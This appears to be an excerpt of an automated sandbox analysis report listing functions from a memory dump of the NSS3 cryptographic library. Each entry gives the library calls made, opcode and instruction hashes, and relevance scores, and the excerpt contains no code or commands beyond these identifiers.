Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 760ccae14f6eae8e2368c2ac2dd678c2a310f216faf784739f77156b34a10fff
Instruction ID: 1cde5a21bc15c9434992e13abaacdfdb4c19a2bcff9207b93aa61282bae68cb9
Opcode Fuzzy Hash: 760ccae14f6eae8e2368c2ac2dd678c2a310f216faf784739f77156b34a10fff
Instruction Fuzzy Hash: 094166B5A41A02DFC704CF29E58095AFBF1FF48328765852AD959DBB11E331E852CF90

Uniqueness

Uniqueness Score: -1.00%

Function 68D36C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 68D36C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 68D36CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 68D36CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,68E58FE0), ref: 68D36CFE

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 5c139eaef72b7af7c1979f8ffa3c67d8a7c600935e2068f5cf30ab213ae95de8
Instruction ID: 408333a9be01a73a84f60bc7b0c54660c09a87962fdd2cd5e1140741eece50fc
Opcode Fuzzy Hash: 5c139eaef72b7af7c1979f8ffa3c67d8a7c600935e2068f5cf30ab213ae95de8
Instruction Fuzzy Hash: 7A3181B5A002269FDB04DF65EC90ABFBBF5EF46284B50442DDA15E7340EB719911CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 68DA2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 68DA2896
NSS_CMSEncoder_Finish.NSS3(?), ref: 68DA2932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 68DA294C
free.MOZGLUE(?), ref: 68DA2955

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 8483cd4ce6d5f13671549897e51ebbaf02006d5a15acf07a5e79696723411ef3
Instruction ID: b3b06e1e3c17a10ce98931dec08bfd4603eb11f37b6a6b96158dd07626461632
Opcode Fuzzy Hash: 8483cd4ce6d5f13671549897e51ebbaf02006d5a15acf07a5e79696723411ef3
Instruction Fuzzy Hash: 8421B2BA640600DBEB208B27EC05F1777E9AF897ACF650538E49997261FB31E4148771

Uniqueness

Uniqueness Score: -1.00%

Function 68DDA8F0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,68DC2AE9,00000000,0000065C), ref: 68DDA91D

Part of subcall function 68D7ADC0: TlsGetValue.KERNEL32(?,68D5CDBB,?,68D5D079,00000000,00000001), ref: 68D7AE10
Part of subcall function 68D7ADC0: EnterCriticalSection.KERNEL32(?,?,68D5CDBB,?,68D5D079,00000000,00000001), ref: 68D7AE24
Part of subcall function 68D7ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,68D5D079,00000000,00000001), ref: 68D7AE5A
Part of subcall function 68D7ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,68D5CDBB,?,68D5D079,00000000,00000001), ref: 68D7AE6F
Part of subcall function 68D7ADC0: free.MOZGLUE(85145F8B,?,?,?,?,68D5CDBB,?,68D5D079,00000000,00000001), ref: 68D7AE7F
Part of subcall function 68D7ADC0: TlsGetValue.KERNEL32(?,68D5CDBB,?,68D5D079,00000000,00000001), ref: 68D7AEB1
Part of subcall function 68D7ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,68D5CDBB,?,68D5D079,00000000,00000001), ref: 68D7AEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,68DC2AE9,00000000,0000065C), ref: 68DDA934
SECITEM_ZfreeItem_Util.NSS3(00068C9A,00000000,00000000,00000000,?,?,68DC2AE9,00000000,0000065C), ref: 68DDA949
free.MOZGLUE(00068C86,00000000,0000065C), ref: 68DDA952

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 52f2ec5ca89f4049023710764fc04b920f443390ea12b563f3f7b4a2386466cd
Instruction ID: 11906cb23588a1c12c97da1dc8ae7a4ad94ed1a4b6a6dc44fa675801b1285382
Opcode Fuzzy Hash: 52f2ec5ca89f4049023710764fc04b920f443390ea12b563f3f7b4a2386466cd
Instruction Fuzzy Hash: 613119B5601211DFDB04CF14E980E62B7E8FF49354F9681A9E8199F356E730E911CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 68D8ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,68D8F0AD,68D8F150,?,68D8F150,?,?,?), ref: 68D8ECBA

Part of subcall function 68D90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,68D387ED,00000800,68D2EF74,00000000), ref: 68D91000
Part of subcall function 68D90FF0: PR_NewLock.NSS3(?,00000800,68D2EF74,00000000), ref: 68D91016
Part of subcall function 68D90FF0: PL_InitArenaPool.NSS3(00000000,security,68D387ED,00000008,?,00000800,68D2EF74,00000000), ref: 68D9102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 68D8ECD1

Part of subcall function 68D910C0: TlsGetValue.KERNEL32(?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D910F3
Part of subcall function 68D910C0: EnterCriticalSection.KERNEL32(?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D9110C
Part of subcall function 68D910C0: PL_ArenaAllocate.NSS3(?,?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D91141
Part of subcall function 68D910C0: PR_Unlock.NSS3(?,?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D91182
Part of subcall function 68D910C0: TlsGetValue.KERNEL32(?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D9119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 68D8ED02

Part of subcall function 68D910C0: PL_ArenaAllocate.NSS3(?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D9116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 68D8ED5A

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 5dd2600adeaa942ca83c6c7fff64d6a1d443541b27b816b10027944a565c6075
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 5B21A4B5A007429BE700CF25D944B26B7E4BFA5388F55C215E81C8B262EB70E594CEF0

Uniqueness

Uniqueness Score: -1.00%

Function 68D5C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 68D5C890

Part of subcall function 68D58F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 68D58FAF
Part of subcall function 68D58F70: PR_Now.NSS3(?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 68D58FD1
Part of subcall function 68D58F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 68D58FFA
Part of subcall function 68D58F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 68D59013
Part of subcall function 68D58F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353), ref: 68D59042
Part of subcall function 68D58F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 68D5905A
Part of subcall function 68D58F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 68D59073
Part of subcall function 68D58F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,68D4DA9B,?,00000000,?,?,?,?,CE534353), ref: 68D59111

PR_GetCurrentThread.NSS3 ref: 68D5C8B2

Part of subcall function 68DF9BF0: TlsGetValue.KERNEL32(?,?,?,68E40A75), ref: 68DF9C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 68D5C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 68D5C8EB

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 4f679dc3f9cddc6744ff99b7097c13220ee8727425b7133e2c6b0bc0946d39ce
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: D001A56AE10211BBDF011BB57C80A7F3E699B452F8F840037FD14A6201F765993496B3

Uniqueness

Uniqueness Score: -1.00%

Function 68DA08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,68DA09B3,0000001A,?), ref: 68DA08E9

Part of subcall function 68D90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 68D908B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 68DA08FD

Part of subcall function 68D8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,68D88D2D,?,00000000,?), ref: 68D8FB85
Part of subcall function 68D8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 68D8FBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 68DA0939
PR_SetError.NSS3(FFFFE013,00000000), ref: 68DA0953

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 4e6103d6f23410f74e3ea7497bc4bfa834c36a840624feb442ba10e5b025c18d
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: EA0184B960060AEBFB149F35EC11B3737999F443D4F988439EC6AD6241EB31EC108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 68D849C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 68D88800: TlsGetValue.KERNEL32(?,68D9085A,00000000,?,68D38369,?), ref: 68D88821
Part of subcall function 68D88800: TlsGetValue.KERNEL32(?,?,68D9085A,00000000,?,68D38369,?), ref: 68D8883D
Part of subcall function 68D88800: EnterCriticalSection.KERNEL32(?,?,?,68D9085A,00000000,?,68D38369,?), ref: 68D88856
Part of subcall function 68D88800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 68D88887
Part of subcall function 68D88800: PR_Unlock.NSS3(?,?,?,?,68D9085A,00000000,?,68D38369,?), ref: 68D88899

PR_SetError.NSS3 ref: 68D84A10
TlsGetValue.KERNEL32(68D7781D,?,68D6BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 68D84A24
EnterCriticalSection.KERNEL32(?,?,?,68D6BD28,00CD52E8), ref: 68D84A39
PR_Unlock.NSS3(?,?,?,?,68D6BD28,00CD52E8), ref: 68D84A4E

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: d1dd240459591ebfca8e40e5677de95714b1bc2218e7487ce4ee403090099248
Instruction ID: e8976cb55961b73ac064f39f527e0d9d0c36cccde0c8c68453dbcf0747af92a5
Opcode Fuzzy Hash: d1dd240459591ebfca8e40e5677de95714b1bc2218e7487ce4ee403090099248
Instruction Fuzzy Hash: 8C211AB9A04700DFDF20AF79D08452EB7F8FF46798B414929D8999B301E734E844CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 68DDAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,68DC5F17,?,?,?,?,?,?,?,?,68DCAAD4), ref: 68DDAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,68DC5F17,?,?,?,?,?,?,?,?,68DCAAD4), ref: 68DDACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,68DCAAD4), ref: 68DDACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,68DCAAD4), ref: 68DDACDB

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: edeef7dfa74b61ea7197651c38a898e54900ee33298c37e958017e52c3b06c4f
Instruction ID: 3a4e11076c631953089c9f5dc283a9e36964c60a9424594c3ad770b8790b533a
Opcode Fuzzy Hash: edeef7dfa74b61ea7197651c38a898e54900ee33298c37e958017e52c3b06c4f
Instruction Fuzzy Hash: 780152B5600B019FD760DF39E944717B7E8BF016A5B404939D86ED3A00E731F455CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 68D888E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,68D908AA,?), ref: 68D888F6
EnterCriticalSection.KERNEL32(?,?,?,?,68D908AA,?), ref: 68D8890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,68D908AA,?), ref: 68D88936
PR_Unlock.NSS3(?,?,?,?,?,68D908AA,?), ref: 68D88940

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: f5e0a2300f277ce68310687590ce96bb011715baf4592f60db4375ac58ffe1f3
Instruction ID: bcc2d9fb59ae3107b5c0a99f734742bbc1d1e4a65636694f7d5e9e49fc433ad1
Opcode Fuzzy Hash: f5e0a2300f277ce68310687590ce96bb011715baf4592f60db4375ac58ffe1f3
Instruction Fuzzy Hash: 660184B4904605DFDB00BF79D084629B7F4FF063D4F410A69D89887201E730E494CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 68DC0840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(68E92F88,68DC0660,00000020,00000000,?,?,68DC2C3D,?,00000000,00000000,?,68DC2A28,00000060,00000001), ref: 68DC0860

Part of subcall function 68CB4C70: TlsGetValue.KERNEL32(?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4C97
Part of subcall function 68CB4C70: EnterCriticalSection.KERNEL32(?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4CB0
Part of subcall function 68CB4C70: PR_Unlock.NSS3(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,68DC2C3D,?,00000000,00000000,?,68DC2A28,00000060,00000001), ref: 68DC0874
EnterCriticalSection.KERNEL32(00000001), ref: 68DC0884
PR_Unlock.NSS3 ref: 68DC08A3

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: b488d5822bfdc983857758dcad80184ec800f30544d4064ff735761d28f4e0c4
Instruction ID: afdfd16313af76de456cdecd4828e01e88307585ef000d77f96970d4d4471334
Opcode Fuzzy Hash: b488d5822bfdc983857758dcad80184ec800f30544d4064ff735761d28f4e0c4
Instruction Fuzzy Hash: 1701F7B9904204EBEF012B65EC4496D776CDF6B3E9F844262EC2C63102E7619C5487F2

Uniqueness

Uniqueness Score: -1.00%

Function 68E4CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 68E4CC61
free.MOZGLUE ref: 68E4CC6E
DeleteCriticalSection.KERNEL32(?), ref: 68E4CC80
free.MOZGLUE(?), ref: 68E4CC87

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 5fe82a908e9c98f4c5f17f7e60145ba837a5753ea0d0b3b1c3257e39dde982b9
Instruction ID: ffe79e28b3a80c9e35d1773ce53c52a1661d77e6799955993f664d00feb52204
Opcode Fuzzy Hash: 5fe82a908e9c98f4c5f17f7e60145ba837a5753ea0d0b3b1c3257e39dde982b9
Instruction Fuzzy Hash: 30E065B66006089FCA10DFA8DC84C8F77ACEF4B2703150A65E695D3700D231F905CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 68D449C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 68D44860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D44894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,68D46361,?,?,?), ref: 68D44A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,68D46361,?,?,?), ref: 68D44AD0

Strings

@uU~/, xrefs: 68D449CF

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: @uU~/
API String ID: 1982233058-2989128320
Opcode ID: a15f2615818fea949aa04b229feb609b171c4df0e37d11b8987d7e258163b71d
Instruction ID: 309eb0ed159f1117150fa5961ce74bc340e1dd5ffeb0db6390b276aa0495b518
Opcode Fuzzy Hash: a15f2615818fea949aa04b229feb609b171c4df0e37d11b8987d7e258163b71d
Instruction Fuzzy Hash: A631E930906105D7EB308F45EC5677E7227D742398FD04929D625A73C0C674988287BE

Uniqueness

Uniqueness Score: -1.00%

Function 68D42800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008), ref: 68D42847

Part of subcall function 68D90BE0: malloc.MOZGLUE(68D88D2D,?,00000000,?), ref: 68D90BF8
